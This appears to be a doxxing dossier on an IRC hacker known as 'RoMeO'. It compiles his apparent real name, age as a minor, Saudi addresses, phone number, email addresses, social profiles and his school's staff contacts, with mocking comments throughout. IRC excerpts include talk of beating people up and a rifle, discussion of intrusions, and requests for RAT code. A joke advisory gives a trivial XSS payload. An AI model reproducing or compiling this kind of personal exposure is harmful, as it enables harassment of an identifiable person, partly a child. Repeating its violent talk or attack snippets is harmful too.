Darkmindz.com on 2008-01-05 - Domain History
|
||
|
||
|
||
Registrant:
|
||
Individual
|
||
King Fahad ST.
|
||
Riyadh,
|
||
SA
|
||
|
||
Domain name: DARKMINDZ.COM
|
||
|
||
Administrative Contact:
|
||
Perlman, Menachem romeo.haxxor@gmail.com
|
||
King Fahad ST.
|
||
Riyadh,
|
||
SA
|
||
+966.509121263
|
||
Technical Contact:
|
||
Perlman, Menachem romeo.haxxor@gmail.com
|
||
King Fahad ST.
|
||
Riyadh,
|
||
SA
|
||
+966.509121263
|
||
|
||
|
||
Darkmindz.com on 2009-07-31 - Domain History
|
||
|
||
Domain name: darkmindz.com
|
||
|
||
Registrant Contact:
|
||
NA
|
||
NA Individual ()
|
||
|
||
Fax:
|
||
King Fahad ST.
|
||
Riyadh, P
|
||
SA
|
||
|
||
Administrative Contact:
|
||
NameCheap.com
|
||
NameCheap.com NameCheap.com (support@NameCheap.com)
|
||
+1.6613102107
|
||
Fax: +1.5555555555
|
||
8939 S. Sepulveda Blvd. #110 - 732
|
||
Westchester, CA 90045
|
||
US
|
||
|
||
|
||
/*
|
||
Domain history shows exactly RoMeo past and current Saudi Arabia address, including his mobile number.
|
||
The registrant name provided in the registration of the domain between 2007-02-24 and 2008-01-05 came
|
||
in contradiction with our research, therefore was classified as fake.
|
||
*/
|
||
|
||
Cybershade.org on 2008-12-23 - Domain History
|
||
|
||
Domain ID:D149271481-LROR
|
||
Domain Name:CYBERSHADE.ORG
|
||
Created On:29-Sep-2007 15:21:51 UTC
|
||
Last Updated On:22-Dec-2008 17:59:31 UTC
|
||
Expiration Date:29-Sep-2010 15:21:51 UTC
|
||
Sponsoring Registrar:eNom, Inc. (R39-LROR)
|
||
Status:OK
|
||
Registrant ID:15a646b0510
|
||
Registrant Name:Cybershade Inc
|
||
Registrant Street1:123 Cybershade org
|
||
Registrant Street2:
|
||
Registrant Street3:
|
||
Registrant City:Internet
|
||
Registrant State/Province:DOMAIN
|
||
Registrant Postal Code:Z1P CD3
|
||
Registrant Country:GB
|
||
Registrant Phone:+44.123567890
|
||
Registrant Phone Ext.:
|
||
Registrant FAX:
|
||
Registrant FAX Ext.:
|
||
Registrant Email:crawleruk@gmail.com
|
||
Admin ID:15a646b0510
|
||
Admin Name:Cybershade Inc
|
||
Admin Street1:123 Cybershade org
|
||
Admin Street2:
|
||
Admin Street3:
|
||
Admin City:Internet
|
||
Admin State/Province:DOMAIN
|
||
Admin Postal Code:Z1P CD3
|
||
Admin Country:GB
|
||
Admin Phone:+44.123567890
|
||
Admin Phone Ext.:
|
||
Admin FAX:
|
||
Admin FAX Ext.:
|
||
Admin Email:crawleruk@gmail.com
|
||
Tech ID:15a646b0510
|
||
Tech Name:Cybershade Inc
|
||
Tech Street1:123 Cybershade org
|
||
Tech Street2:
|
||
Tech Street3:
|
||
Tech City:Internet
|
||
Tech State/Province:DOMAIN
|
||
Tech Postal Code:Z1P CD3
|
||
Tech Country:GB
|
||
Tech Phone:+44.123567890
|
||
Tech Phone Ext.:
|
||
Tech FAX:
|
||
Tech FAX Ext.:
|
||
Tech Email:crawleruk@gmail.com
|
||
Name Server:NS3.HR-DEVELOPMENT.NET
|
||
Name Server:NS4.HR-DEVELOPMENT.NET
|
||
|
||
// Domain used for their cybershade CMS development.
|
||
|
||
|
||
Hello there and welcome to "RoMeOs" one stop web
|
||
Check it out and let me know what you think, you can contact me on coolking_97@hotmail.com
|
||
Male, 15 years old
|
||
Jedah, Saudi-Arabia
|
||
ref: First Website : http://www.freewebs.com/xromeox/
|
||
|
||
/*
|
||
RoMeO first website teaching "Ileagal Knoweledge!" related to hacking including the basics of IP Address
|
||
and how you can get other people IP Address. Say, you're really special, aren't you?
|
||
*/
|
||
|
||
|
||
RoMeO:
|
||
<script>javascript:alert("hey")< ;/script>
|
||
<plaintext>
|
||
<xmtp>
|
||
18-Mar-07
|
||
212.71.37.x
|
||
|
||
RoMeO:
|
||
thxx amin,, i will do better inshalah by time.. keeep on the comments coming
|
||
22-Oct-06
|
||
82.167.17.x
|
||
|
||
RoMeO:
|
||
Hey yahya, dnt like my web,, call 1800-KISS-MY-ASS
|
||
pukepuke
|
||
21-Oct-06
|
||
82.167.17.x
|
||
|
||
ref: http://www.freewebs.com/xromeox/guestbook.htm
|
||
|
||
// Don't speak unless you can improve the silence..
|
||
|
||
|
||
|
||
Hope You Enjoy Your Stay!
|
||
I made this website right after i was done from the first one..
|
||
i want to send my special thanks and regards to "Amin Osama", "Yahya Maatouk" and last but not least to the
|
||
inspiration of websites creation my sister "Joud Hourani"...
|
||
About Me (RoMeO)
|
||
Name: Faisal Hourani
|
||
Age: 15 years old
|
||
ref: http://xromeox.bravehost.com/
|
||
|
||
// Haiii :]
|
||
|
||
|
||
Faisal :: My Profile (29 views)
|
||
Location
|
||
jeddah, Saudi Arabia
|
||
umm i simply cant describe my self shortly as hi5 says,, soo u intrested of knowing abt me,, email me at
|
||
coolking_97@hotmail.com
|
||
|
||
Interests
|
||
Computer, Internet ,BasketBall,Girls
|
||
Favorite Movies
|
||
Scary Movie,The day after tomorow
|
||
|
||
Favorite TV Shows
|
||
FRIENDS
|
||
|
||
Favorite Books
|
||
Who cares for stupid books!!
|
||
|
||
ref: http://www.hi5.com/friend/p6229610--Faisal--html
|
||
|
||
// I take your word for everything, but I have doubts about your _Girl_ interests
|
||
|
||
|
||
Thamer International School
|
||
|
||
Address:
|
||
Hail Street
|
||
Town/City:
|
||
Jeddah
|
||
Country:
|
||
Saudi Arabia
|
||
Telephone:
|
||
+966-2-6680747
|
||
Fax:
|
||
+966-2-6641320
|
||
Email:
|
||
lenahosn@hotmail.com
|
||
Website:
|
||
http://www.tis-edu.com
|
||
Principal:
|
||
Lena Aboul Hosn (Mrs)
|
||
IGCSE co-ordinator:
|
||
Yassin Etheridge (Mr)
|
||
Gender:
|
||
Mixed
|
||
|
||
// Many thanks to TIS for being so kind and helpful - (social-engineer.org)
|
||
|
||
10/31/2006 5:03:33 PM: Faisal Hourani
|
||
Hello there,, realy awesome code.. loved it, im an admin at my dads net caffe :D, will i needed tht type of
|
||
progs,, anywayz i hav been doin some RATS my self,, im lookin 4 a code to make the server send me an email
|
||
wen the remote user is on the net,, any ideas please email me at "coolking_97@hotmail.com"
|
||
Thanks for helping to "Keep the Planet Clean".
|
||
ref: http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=30182&lngWId=1
|
||
|
||
/*
|
||
Just wondering, have you ever coded anything in your life? Reusing code is good, but you've
|
||
taken it to a different level
|
||
*/
|
||
|
||
10/31/2006 5:37:35 PM: Faisal Hourani
|
||
Ahmed Ezz, Handle-X is the best RAT i have ever used,, i would have paid for it :P ,, just one thing please
|
||
when you are done with any new version even a beta, can you let me know, email me at "coolking_97@hotmail.com"
|
||
(If this comment was disrespectful, please report it.)
|
||
Thanks for helping to "Keep the Planet Clean".
|
||
ref:http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=59815&lngWId=1
|
||
|
||
// There are more _RATs_ around you than you can ever imagine!
|
||
|
||
|
||
My Homepage | darkmindz.com
|
||
http://www.webhostingtalk.com/profile/xRoMeOx
|
||
|
||
UserID: 246663
|
||
Joined: 17/11/2006 11:45:27
|
||
Last Login: 16/01/2008 16:33:17
|
||
Last Active: 16/01/2008 16:33:17
|
||
Website: http://www.darkmindz.com
|
||
MSN: coolking_97@hotmail.com
|
||
Rank: Pentitioner (180 Points)
|
||
Basic: (1) (2) (3) (4) (5)
|
||
Realistic: (1) (2) (3)
|
||
ref: http://www.hackthissite.org/user/view/Nuker
|
||
|
||
// For 2 years you've been struggling to complete the challenges with no apparent luck... or is it skills?
|
||
|
||
|
||
-
|
||
RoMeO is root@DarkMindZ.com * romeo haxxor
|
||
RoMeO is using modes +iwrxt
|
||
RoMeO is connecting from *@absolute.ownage.net 72.20.28.205
|
||
RoMeO is a registered nick
|
||
RoMeO on ~#darkmindz #astalavista #kinqpinz
|
||
RoMeO using twofish.securitychat.org SecurityChat.org ircd
|
||
RoMeO has been idle 6hrs 28mins 18secs, signed on Sat Jun 20 18:35:59
|
||
RoMeO End of /WHOIS list.
|
||
|
||
|
||
Session Start: Tue Jun 09 18:39:34 2009
|
||
Session Ident: #as'#darkmindz
|
||
[16:44:49] <as'RoMeO> we got issues sir
|
||
[16:44:51] <as'RoMeO> get on msn
|
||
|
||
[18:04:23] <as'RoMeO> dmz will never end sir
|
||
[18:04:58] <as'p3ri0d> lol RoMeO
|
||
|
||
[00:13:29] <as'RoMeO> sir
|
||
[00:13:31] <as'pimpinjg> nvm
|
||
[00:13:33] <+as'G-Brain> bsdgurl != bsdgurl
|
||
[00:13:35] <as'RoMeO> ^
|
||
|
||
|
||
[00:49:17] <as'RoMeO> dream on sir
|
||
[00:49:43] <as'Spyware> putting the old dmz back?
|
||
[00:49:49] <as'RoMeO> not doing anything
|
||
|
||
[01:09:28] <as'RoMeO> so you stfu and sit back sir
|
||
[01:09:33] <as'Spyware> You can't disallow people from talking.
|
||
[01:09:36] <as'Spyware> Freedom of Speech, idiot.
|
||
|
||
[01:13:37] <as'RoMeO> what is your point sir
|
||
[01:13:41] <as'Spyware> hang on
|
||
[01:13:47] <as'Spyware> Gotta quote something for you
|
||
|
||
// Sir! sir! keep talking.. someday you might say something intelligent!
|
||
|
||
[03:33:28] <RoMeO> ..
|
||
[03:33:32] <Biber> hhaha
|
||
[03:33:34] <RoMeO> comin to the UK
|
||
[03:33:38] <RoMeO> to kick your ass
|
||
[03:33:43] <AlbinoSkunk> geee someone is going to have to drink some beer with this mofo
|
||
[03:33:44] <Biber> w00t run away AlbinoSkunk!!!
|
||
[03:33:49] <Biber> no wait
|
||
[03:33:55] <Biber> get a baseball bat xD
|
||
[03:34:02] <RoMeO> that wont save you
|
||
[03:34:04] <AlbinoSkunk> RoMeO you best meet up
|
||
[03:34:11] <RoMeO> oh i will
|
||
[03:34:12] <TheM> Better, get one of those no-stab knives they sell up in the U.K.
|
||
[03:34:14] <RoMeO> i wanna meet
|
||
[03:34:15] <RoMeO> xlink
|
||
[03:34:16] <AlbinoSkunk> i got an idea
|
||
[03:34:19] <RoMeO> reaper
|
||
[03:34:21] <RoMeO> mmm
|
||
[03:34:24] <RoMeO> x2fuson
|
||
[03:34:31] <RoMeO> who else
|
||
[03:34:37] <AlbinoSkunk> i kidnap xLink, and a few other dudes and we all go to the next HBH conference
|
||
[03:34:42] <RoMeO> dood i know like 1000 uk hackars
|
||
[03:34:42] <Biber> ill come too, to rob you all!
|
||
[03:34:42] <AlbinoSkunk> and kick ass
|
||
[03:34:50] <RoMeO> lmfao
|
||
[03:34:52] <RoMeO> that would be fun
|
||
[03:34:58] <RoMeO> finally meet cheese
|
||
[03:34:58] <Biber> hhahah yeah
|
||
[03:35:05] <AlbinoSkunk> honestly if you and dick cheese met in the same room
|
||
[03:35:12] <RoMeO> hated him for years, might as well punch him in the face
|
||
[03:35:16] <AlbinoSkunk> that would be crazy
|
||
[03:35:19] <Biber> lmfao totally
|
||
[03:35:26] <RoMeO> very
|
||
[03:35:40] <RoMeO> i gave that guy a headche for 2 years
|
||
[03:35:45] <RoMeO> made him pay more than he earns
|
||
[03:35:48] <Biber> srsly if i went to UK ,the same day i would end up in prison
|
||
[03:36:02] <AlbinoSkunk> haha
|
||
[03:36:05] <RoMeO> there are no prisons in the UK
|
||
[03:36:08] <RoMeO> they just shoot you on sight
|
||
[03:38:05] <AlbinoSkunk> RoMeO, come here on a student loan and visa?
|
||
[03:38:19] <AlbinoSkunk> OOOOH and we have to go to a 2600 meet up just to stir some shit up
|
||
[03:38:27] * AlbinoSkunk herd fags go there
|
||
[03:38:29] <RoMeO> visa
|
||
[03:38:38] <AlbinoSkunk> no loan?
|
||
[03:38:39] <RoMeO> my money
|
||
[03:38:40] <RoMeO> nope
|
||
[03:38:45] * Joins: chaosphe1e (~chaospher@EclipticX-87048C75.pool.einsundeins.de)
|
||
[03:38:48] <AlbinoSkunk> thats very good
|
||
[03:38:51] <RoMeO> lol
|
||
[03:38:57] <RoMeO> will be in london
|
||
[03:39:00] <AlbinoSkunk> are you staying at the uni campus
|
||
[03:39:03] <Biber> when you're coming back,pass by over here,and bring me some UK drugs
|
||
[03:39:04] <RoMeO> nope
|
||
[03:39:06] <AlbinoSkunk> or renting your own place?
|
||
[03:39:08] <Biber> wanna see how they ride
|
||
[03:39:10] <RoMeO> got a friend there
|
||
[03:39:13] <RoMeO> staying with him
|
||
[03:39:19] <AlbinoSkunk> lucky man
|
||
[03:39:21] <RoMeO> hehe
|
||
|
||
|
||
[2:26am] <~RoMeO> this week
|
||
[2:26am] <~RoMeO> everyone wants me down
|
||
[2:26am] <~RoMeO> eeye came on #bhf
|
||
[2:26am] <~RoMeO> and was like
|
||
[2:26am] <~RoMeO> we are sueing you
|
||
[2:26am] <~RoMeO> they spoke to glyph
|
||
[2:26am] <+RCEg0d> yeah i've seen that
|
||
[2:26am] <~RoMeO> admin of irc
|
||
[2:26am] <~RoMeO> and:
|
||
[2:27am] <~RoMeO> <Eye_SRodd> The reports we have are largely anecdotal, but we believe two users called 'Romeo' and 'Darkpontifex' are behind a recent intrusion
|
||
[2:27am] <+RCEg0d> they have no legal right to log or force him to give info
|
||
[2:27am] <~RoMeO> but
|
||
[2:27am] <~RoMeO> they are still after me
|
||
[2:27am] <~RoMeO> and i dont know whos in on it either
|
||
[2:27am] <~RoMeO> but i am sure
|
||
[2:27am] <~RoMeO> some of my close people online
|
||
[2:27am] <~RoMeO> is ratting me out on alot of stuff
|
||
[2:28am] <~RoMeO> and i cant do anything until i know whos in on it
|
||
[2:29am] <~RoMeO> it doesnt go away like that
|
||
[2:29am] <~RoMeO> they are
|
||
[2:29am] <~RoMeO> grouping against me now
|
||
[2:29am] <~RoMeO> not one or 2
|
||
[2:29am] <~RoMeO> like alot of people
|
||
[2:29am] <~RoMeO> and groups
|
||
|
||
// You have no idea, who, where, what and the rest of the 'w's :)
|
||
|
||
[2:29am] <+RCEg0d> wtf?
|
||
[2:29am] <%p3ri0d> don't want to brag for RoMeO but he's one of those that hsould know about it more then anyone else
|
||
[2:29am] <~RoMeO> i am not kidding
|
||
[2:29am] <%p3ri0d> and shit that's bad
|
||
[2:29am] <+RCEg0d> eeye go legal ok...
|
||
[2:29am] <~RoMeO> eeye can go legal
|
||
[2:29am] <~RoMeO> i dont care about the legal part
|
||
[2:29am] <+RCEg0d> the groups?
|
||
[2:29am] <~RoMeO> i am more concerned about the people invovled in it
|
||
[2:30am] <+RCEg0d> dont worry about the legal shit they can't do a thing
|
||
[2:30am] <+RCEg0d> then dont give em information
|
||
[2:30am] <~RoMeO> its a little too late
|
||
[2:30am] <~RoMeO> plus
|
||
[2:30am] <~RoMeO> sopme people
|
||
[2:30am] <~RoMeO> i truted for years online
|
||
[2:30am] <~RoMeO> are aparently going agasint me now
|
||
[2:30am] <~RoMeO> and if they know what i do, they know my operation etc, trhey can do alot of shit against it
|
||
|
||
// Operation Site Down
|
||
|
||
[2:31am] <~RoMeO> its some annoying shit honestl
|
||
[2:31am] <+RCEg0d> i know how it goes
|
||
[2:31am] <~RoMeO> all started on bhf today
|
||
[2:31am] <+RCEg0d> the thing is.. you are too worried and u might end up doing a mistake
|
||
[2:31am] <+RCEg0d> so first you need to relax and take things from the begining
|
||
[2:32am] <~RoMeO> i understand if they are pissed off that i damanged there shit or w/e, but those people whom i trusted going asgainst me, thats bad
|
||
[2:32am] <+RCEg0d> take out of your operations people you might suspect that they are plotting against u
|
||
[2:32am] <~RoMeO> already out
|
||
[2:32am] <~RoMeO> but i dont wanan just
|
||
[2:32am] <~RoMeO> deluser
|
||
[2:32am] <~RoMeO> i wanna be 100% sure
|
||
[2:32am] <~RoMeO> they are plotting agaisnt me
|
||
[2:32am] <~RoMeO> cause if they arent
|
||
[2:32am] <~RoMeO> and i del them
|
||
[2:32am] <~RoMeO> they will
[2:32am] <~RoMeO> lol
[2:32am] <+RCEg0d> maby they are afraid of the feds
[2:32am] <%p3ri0d> bad fucking situation
[2:33am] <~RoMeO> very bad situation
[2:34am] <+RCEg0d> thats true
[2:34am] <~RoMeO> i think the have an idea that
[2:34am] <~RoMeO> if they fuck with me or they got a few lil info about me
[2:34am] <~RoMeO> or what i do
[2:34am] <~RoMeO> they can just shut it down
[2:34am] <~RoMeO> i have no idea why they think they can do that,but thats the case
[2:35am] <+RCEg0d> keep your shit private and monitor everything
[2:35am] <~RoMeO> everything i know of, is already monitored
[2:35am] <+RCEg0d> if they want to shut you down trust me they will find a way
[2:35am] <~RoMeO> thst how i know of it in the first plae
[2:36am] <+RCEg0d> find out who they are
[2:36am] <~RoMeO> look
[2:36am] <~RoMeO> the people
[2:36am] <~RoMeO> who are in on it and i know of
[2:36am] <~RoMeO> are already comprimised
[2:36am] <~RoMeO> simple as that
[2:36am] <~RoMeO> but
[2:36am] <~RoMeO> i cant do anythin
[2:39am] <+RCEg0d> itg means they dont even know where you are
[2:39am] <+RCEg0d> *it
[2:39am] <~RoMeO> they are getting close to the people i know
[2:40am] <~RoMeO> and i am getting weird people from all over irc pm' ing me randomly
[2:40am] <+RCEg0d> darkpontifex?
[2:40am] <~RoMeO> ctcp requests
[2:40am] <~RoMeO> dark is a #bhf guy too
[2:40am] <+RCEg0d> maby them
[2:40am] <~RoMeO> nah dark cant be on ther side
[2:40am] <+RCEg0d> he was crying in bhf about going to jail
[2:40am] <~RoMeO> hha
[2:41am] <~RoMeO> i am not worried about legailty really, they cant touch me being where i live and who i am
[2:41am] <~RoMeO> but i am more worried online wise
[2:41am] <~RoMeO> worked on alot on this
[2:44am] <%p3ri0d> lol
[2:45am] <+RCEg0d> haha
[2:45am] <+RCEg0d> i say we find were they live
[2:45am] <+RCEg0d> and go beat em up
[2:45am] <+RCEg0d> :P
[2:45am] <~RoMeO> thats an option
[2:45am] <~RoMeO> if shit go really bad
[2:45am] <+RCEg0d> i can take my rifle with me
[2:45am] <~RoMeO> but so far
[2:45am] <~RoMeO> they did try to get what they want from me
[2:45am] <~RoMeO> they couldnt
[2:45am] <~RoMeO> so they will try again
[2:46am] <+RCEg0d> this time u need to be waiting
[2:46am] <+RCEg0d> if there is anything i can do, tell me
[2:46am] <~RoMeO> :)
[2:46am] <%p3ri0d> eh, I need some action too. Count me in
[2:46am] <+RCEg0d> hehehe
[2:46am] <~RoMeO> :)
[2:47am] <~RoMeO> its WAR
[2:47am] <~RoMeO> the plot thickned alot
[2:47am] <+RCEg0d> lets kick some ass :P
[2:47am] <~RoMeO> never thought it would go THIS far
[2:47am] <~RoMeO> people get owned all the time
[2:47am] <~RoMeO> but those people took it to the heart
[2:47am] <~RoMeO> rofl
[2:51am] <+RCEg0d> well in teh scene, when something bad was about to happen, we changed group names, nicks and dropped all our contacts + servers and started up fresh
[2:52am] <~RoMeO> there is no group name
[2:52am] <+RCEg0d> u get my meaning though
[2:52am] <~RoMeO> my nick isnt easy to just change

// Ever tried "/nick <newnick>" ?

[2:42pm] <~RoMeO> basically, when i was younger
[2:42pm] <~RoMeO> i skipped all math classes
[2:42pm] <~RoMeO> and that affected me alot
[2:42pm] <+RCEg0d> ah, u didnt get the basics
[2:42pm] <~RoMeO> since i fucked alot of my basics
[2:42pm] <~RoMeO> yes
[2:42pm] <~RoMeO> so when i went to A levels
[2:42pm] <~RoMeO> i am like ???????
[2:42pm] <+RCEg0d> yeah its like a chain, break a part and u get fucked :P
[2:42pm] <~RoMeO> well yea
[2:42pm] <~RoMeO> i got fucked
[2:42pm] <~RoMeO> basically
[2:42pm] <+RCEg0d> how long did u do math A levels?
[2:42pm] <~RoMeO> 1 year
[2:42pm] <~RoMeO> this year
[2:42pm] <~RoMeO> lol
[2:43pm] <+RCEg0d> hmm
[2:43pm] <+RCEg0d> well u cant get everything right in 1 year
[2:43pm] <~RoMeO> well las year
[2:43pm] <~RoMeO> yea
[2:43pm] <~RoMeO> but w/e all good now
[2:43pm] <~RoMeO> got accepted into uni
[2:43pm] <~RoMeO> and everything
[2:43pm] <~RoMeO> ^_^
[2:43pm] <+RCEg0d> cool
[2:43pm] <+RCEg0d> uk?
[2:43pm] <~RoMeO> yessir
[2:43pm] <+RCEg0d> nice
[2:43pm] <+RCEg0d> me2 :P
[2:43pm] <~RoMeO> ;D
[2:43pm] <~RoMeO> nice
[2:43pm] <+RCEg0d> in bristol
[2:43pm] <~RoMeO> london
[2:43pm] <+RCEg0d> comp science ofcourse :P
[2:44pm] <~RoMeO> software engineeering and multimedia
[2:44pm] <+RCEg0d> nice
[2:44pm] <~RoMeO> :]
[2:44pm] <+RCEg0d> i think i have a friend thats doing that in london
[2:44pm] <~RoMeO> ask him about it plz
[2:44pm] <~RoMeO> i dont wanna get into it and get fucked too

// You just love getting it, dont ya?

[2:44pm] <~RoMeO> xD
[2:44pm] <~RoMeO> if it involves loads of math, get me out
[2:45pm] <~RoMeO> i know CS does
[2:45pm] <+RCEg0d> hmmm
[2:45pm] <~RoMeO> so thats not an option
[2:45pm] <+RCEg0d> well it does a lil bit
[2:45pm] <+RCEg0d> in multimedia
[2:45pm] <~RoMeO> a lil bit is okay
[2:45pm] <~RoMeO> you cant runa way from math
[2:45pm] <~RoMeO> away*
[2:45pm] <+RCEg0d> he told me that they had to code opengl + C
[2:45pm] <~RoMeO> lovely
[2:45pm] <~RoMeO> thats math
[2:45pm] <~RoMeO> alot of it
[2:46pm] <~RoMeO> oh
[2:46pm] <+RCEg0d> but he passed because of the coursework
[2:46pm] <~RoMeO> theory i hated in computers
[2:46pm] <~RoMeO> is*
[2:46pm] <~RoMeO> reminds me of last year and the years before, school theory exams
[2:46pm] <~RoMeO> i know my shit in practical work
[2:46pm] <+RCEg0d> hate em
[2:46pm] <~RoMeO> but theory, its a lil more complicated to get the teacher to understand lol
[2:47pm] <~RoMeO> you cant exactly attach screenshots
[2:47pm] <+RCEg0d> hehehe
[2:48pm] <~RoMeO> btw
[2:48pm] <~RoMeO> yesterdays threats
[2:48pm] <+RCEg0d> well with software engineering there's a lot of theory
[2:48pm] <~RoMeO> 90% terminated
[2:48pm] <+RCEg0d> yeah?
[2:48pm] <~RoMeO> :]
[2:48pm] <+RCEg0d> cool
[2:48pm] <+RCEg0d> see, everything went alright
[2:48pm] <~RoMeO> it was a few slips on my end
[2:48pm] <~RoMeO> all fixed
[2:48pm] <~RoMeO> i learned a huge deal from it tho
[2:48pm] <~RoMeO> good thing it was caught
[2:48pm] <+RCEg0d> what was it?
[2:49pm] <~RoMeO> wont get into details
[2:49pm] <~RoMeO> but yea
[2:49pm] <~RoMeO> i fucked up a bit
[2:49pm] <~RoMeO> and people
[2:49pm] <~RoMeO> took advantage
[2:49pm] <~RoMeO> instantl
[2:49pm] <~RoMeO> instantly*
[2:50pm] <+RCEg0d> they got what they wanted?
[2:50pm] <~RoMeO> nope
[2:50pm] <~RoMeO> i win
[2:50pm] <~RoMeO> ;D
[2:50pm] <+RCEg0d> haha lamerz
[2:50pm] <~RoMeO> was up all night workin on making sure everything is intact
[2:50pm] <~RoMeO> tired shitless
[2:51pm] <+RCEg0d> no sleep?
[2:51pm] <~RoMeO> slept a bit
[2:51pm] <~RoMeO> but then woke up
[2:52pm] <~RoMeO> and was liek
[2:52pm] <~RoMeO> fuck it
[2:52pm] <+RCEg0d> on the keyboard?
[2:52pm] <~RoMeO> gotta get this shit fixed
[2:52pm] <~RoMeO> ah no, i did that only once
[2:52pm] <~RoMeO> lolol
[2:52pm] <+RCEg0d> hehe, u were worried thats why u couldnt sleep
[2:52pm] <~RoMeO> yea
[2:52pm] <~RoMeO> cant let this go far
[2:52pm] <+RCEg0d> yeah i did it a couple of times... bad experience
[2:52pm] <~RoMeO> it will fucking go nuts
[2:52pm] <+RCEg0d> especially when u wake up and have QWERTY writen on your forehead
[2:52pm] <~RoMeO> LOL
[2:52pm] <~RoMeO> happened to me only once
[2:53pm] <+RCEg0d> hahaha
[2:53pm] <~RoMeO> my dad woke me up
[2:53pm] <~RoMeO> that was

[11:01:44] * Joins: as'RoMeO (RoMeO@cloaked-1D0129D7.ownage.net)
[11:16:43] * Parts: as'Guest45609 (rsca@cloaked-BFBC7842.org)
[11:16:54] * Joins: as'KO9 (ollie@mudkipz.gov)
[11:16:54] * as'ChanServ sets mode: +v as'KO9
[11:17:29] <as'RoMeO> asta is sueing me :(
[11:17:59] <+as'KO9> wut?
[11:18:06] <as'RoMeO> this dude
[11:18:08] <as'RoMeO> came in #bhf
[11:18:12] <as'RoMeO> and was like
[11:18:16] <as'RoMeO> ' i am suing you for hacking asta'
[11:18:21] <as'RoMeO> -_-'
[11:18:31] <+as'KO9> oh noez
[11:18:34] <as'RoMeO> i know right
[11:18:56] <+as'KO9> go get the magnets and destroy your hdd!!1
[11:19:03] <+as'KO9> must destroy all evidence
[11:19:18] <as'RoMeO> i must
[11:19:55] <+as'KO9> EmErgE: so who broke the server?
[11:20:20] <as'RoMeO> it broked itself
[11:20:24] <as'RoMeO> it was like SIGFUCK

// sigdie(); vs fatal(); - http://www.securityfocus.com/bid/20241

[11:20:25] <as'RoMeO> and voom
[11:20:32] <as'RoMeO> boom*
[11:20:57] <+as'KO9> ;[
[11:22:01] <@as'EmErgE> KO9~ can't be sure, it just crashed out of the blue and came back up after working out with the provider
[11:22:14] * Joins: as'd4de (d4de@1.0.0.127.in-addr.arpa)
[11:22:14] * as'ChanServ sets mode: +v as'd4de
[11:26:51] <+as'KO9> EmErgE: weird
[11:26:59] <+as'KO9> they blatently pulled the power
[11:27:07] <+as'KO9> and when you spoke to them they were like 'o shi-'
[11:27:13] <as'RoMeO> xD
[11:27:17] <as'RoMeO> awknet does that
[11:27:23] <+as'KO9> heeeeeeeh
[11:27:26] <+as'KO9> don't get me started on awknet
[11:27:29] <as'RoMeO> lmao
[11:27:31] <+as'KO9> Jason is a fucking tosspot
[11:27:33] <as'RoMeO> do tell
[11:27:34] <as'RoMeO> LOL
[11:27:43] <+as'KO9> stole my money
[11:27:44] <as'RoMeO> oh
[11:27:44] <as'RoMeO> do tell
[11:27:53] <+as'KO9> I bought a 'ddos protected' server from him
[11:28:06] <+as'KO9> server was down for most of the 1 and a half i had it
[11:28:10] <+as'KO9> and he refused to help
[11:28:16] <as'RoMeO> ;(
[11:28:21] <+as'KO9> despite posting him ifconfig's with loads of overruns and shit
[11:28:32] <+as'KO9> denying it was a network problem when i had another box on his network
[11:28:44] <+as'KO9> which couldn't even contact my own one
[11:28:44] <+as'KO9> heh
[11:28:45] <as'RoMeO> lol
[11:28:46] <as'RoMeO> sucks

------------[ Advisory:

Vulnerable Software: wall on SSH protocol 1 && putty.exe
Found by: RoMeO && pimpinjg
Impact: Log bash cookies and massive lulz

------------[ PoC:

root@server~# wall "<script>alert(1)</script>"

http://i43.tinypic.com/21317c6.png

// root@mercedes ??

[14:52:44] <&RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
[14:53:42] <connection> RoMeO: now that you've had your fun
[14:53:46] <&RoMeO> :)
[14:53:53] <&RoMeO> i had the lulz of a life time
[14:53:53] <connection> feel like explaining integer underflows
[14:53:56] <&RoMeO> no

.____ ____ ___.____ __________ .___.__ .__
| | | | \ | \____ / __| _/|__| ______ ____ | | ____ ________ _________ ____
| | | | / | / / ______ / __ | | |/ ___// ___\| | / _ \/ ___/ | \_ __ \_/ __ \
| |___| | /| |___ / /_ /_____/ / /_/ | | |\___ \\ \___| |_( <_> )___ \| | /| | \/\ ___/
|_______ \______/ |_______ \/_______ \ \____ | |__/____ >\___ >____/\____/____ >____/ |__| \___ >
\/ \/ \/ \/ \/ \/ \/ \/ PRESENTS
[ XSS in wall on SSH 1 / putty ]

Hello there, im new in here, actually im new to the whole fedora project, i have a fedora core 3, and i was trying
|
||
alot to connect it to the internet but no use!
|
||
i have a wireless network at my home, and a modem "Motorolla sm65" i just couldnt install them on the computer, any ideas?
|
||
|
||
you can email me at: romeo.haxxor@gmail.com
|
||
thanks../
|
||
|
||
Join Date: Jan 2007
|
||
Location: Saudi-Arabia
|
||
Posts: 6
|
||
|
||
Ref: http://forums.fedoraforum.org/showthread.php?t=146470
|
||
|
||
/*
|
||
If he can't install a modem then I don't see how he could hack his way out of a wet paper bag...
|
||
oh wait... he can't... he's a skiddie!
|
||
*/
|
||
|
||
|
||
Posted 30 May 2008 - 03:13 AM
I am glad you like the articles section :) , what about the code base tho? any comments on that maybe?

and hm, I have A levels ( GCSE ) exams atm, after that the new release of DMZ will start, and the main
prios to improve are:

- Layout
- Submit system + articles / codes system.

all the articles and codes will be reformatted to look at its best, etc....

@intimidat0r, I sure will :)

ref: https://www.binrev.com/forums/index.php/topic/37778-darkmindz/page__view__findpost__p__308906

// Your first professional certification I presume?

DarkMindZ
tags: turbocharged06 romeo r4z0rbl4de the reaper xlink jath darkmindz darkmindz.org dmz hacking hacking
group underground hackers security experts graphics tutorials learning
ref: http://www.urbandictionary.com/define.php?term=DarkMindZ

/*
Must suck to have two different conflicting personalities.
Whats next? Animal Detectives or Horse humpers (http://www.youtube.com/watch?v=Cf3p1mXHfqY)
*/

Facebook Lulz
|
||
-------------
|
||
|
||
Faisal Hourani
|
||
SocialInterview.com asked me "Name someone you wish you could date."
|
||
I answered ''Megan Fox. rawr''
|
||
November 15 at 3:56am via Social Interview
|
||
|
||
|
||
Faisal Hourani
|
||
SocialInterview.com asked me "What would your mother think if she saw everything you've posted on Facebook?"
|
||
I answered ''She already checks out everything, everyday. Hi mom :]...''
|
||
November 15 at 10:06pm via Social Interview
|
||
|
||
// We hope she checks this out:] Hai Faisal's mom
|
||
|
||
|
||
Faisal Hourani
|
||
SocialInterview.com asked me "If you could rule any country or place, what would you pick?"
|
||
I answered: "The world =O"
|
||
|
||
